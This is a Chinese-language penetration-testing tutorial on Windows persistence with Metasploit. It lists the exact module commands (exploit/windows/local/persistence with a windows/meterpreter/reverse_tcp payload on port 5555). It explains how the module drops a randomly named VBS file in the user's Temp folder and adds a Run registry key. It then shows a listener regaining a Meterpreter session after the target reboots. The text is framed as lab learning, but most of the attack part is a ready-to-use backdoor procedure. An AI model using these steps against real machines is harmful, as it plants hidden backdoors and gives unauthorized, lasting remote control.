持久化

在渗透测试中，持久化是指攻击者在入侵系统后，为了保持对系统的控制，会在系统上留下一些后门或者其他的恶意代码，以确保在目标主机重启、用户凭证更改和系统访问终端后，攻击者仍然可以随时重新访问系统。

Metasploit 框架实现持久化

use exploit/windows/local/persistence 修改注册表启动项进行持久化

攻击者入侵系统后，修改windows系统的注册表，将注册表与木马文件进行管理，目标机重启电脑或者用户重新登录时，攻击者可以再次访问目标机。

windows注册表位置

下文涉及到的持久化程序与下列文件路径有关
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

建立 Meterpreter 会话

利用Metasploit框架与目标机建立Meterpreter会话

参考
渗透测试_漏洞利用_利用木马文件开启目标系统远程桌面_use exploit/multi/handler 介绍的方法，建立Meterpreter连接

配置 persistence

use exploit/windows/local/persistence
set payload windows/meterpreter/reverse_tcp
set lport 5555
set session 1  //该会话号需与前序配置的handle模块相一致
show options
exploit

执行模块，可以看到模块将随机命名的vbs文件上传到C:\Users\mikowoo\AppData\Local\Temp\ihflrnZhHRh.vbs 目录下，并且修改了 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SwboKcxfM 系统注册表


AppData 文件夹为受保护的文件夹，通常为隐藏状态，通过如下操作显示文件夹

查看模块修改后的注册表情况

新建与持久化有关的Meterpreter会话

新建监听会话，设置端口号5555(persistence模块配置的端口号)

重启Windows目标机进行测试，可以看到监听Meterpreter可以与目标机进行连接